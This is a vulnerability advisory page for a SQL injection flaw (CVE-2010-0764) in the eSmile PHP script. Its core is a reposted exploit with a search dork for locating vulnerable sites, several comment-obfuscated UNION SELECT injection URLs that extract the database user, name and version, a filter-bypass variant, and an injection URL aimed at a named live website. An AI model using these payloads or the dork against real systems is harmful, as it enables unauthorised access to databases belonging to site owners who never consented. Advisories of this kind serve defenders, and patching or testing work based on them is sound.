Topic : | eSmile (index.php) Sql Injection Vulnerability
|
SecurityAlert : 7072
CVE : CVE-2010-0764
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Sec Attack Team
Published : 04.03.2010
Affected Software : | kuwaitphp:esmile |
 Advisory Content :
eSmile (index.php) Sql Injection Vulnerability
==============================================================
#######
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : eSmile
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "Powered by: eSmile"
####################################################################
===[ Exploit ]===
www.site.com/index.php?do=show&cid=null[Sql Injection]
www.site.com/index.php?do=show&cid=null'/**/and/**/1=2/**/union/**/select/*
*/111,222,333,444,555,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
-- -
www.site.com/index.php?do=show&cid=null'/**/and/**/1=2/**/union/**/select/*
*/111,222,333,444,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),666
-- -
T0 Bypass Not Acceptable
www.site.com/index.php?do=show&cid=-NULL'/**/UNION/**/ALL/**/SELECT/**/111,
222,333,444,555,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
Script Site:
http://smailz.com/index.php?do=show&cid=null'/**/and/**/1=2/**/union/**/sel
ect/**/111,222,333,444,CONCAT_WS(CHAR(32,58,32),user(),database(),version()
),666-- -
#################
References :
http://xforce.iss.net/xforce/xfdb/56206
http://www.exploit-db.com/exploits/11382
http://secunia.com/advisories/38548
http://packetstormsecurity.org/1002-exploits/esmile-sql.txt
http://osvdb.org/62272
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|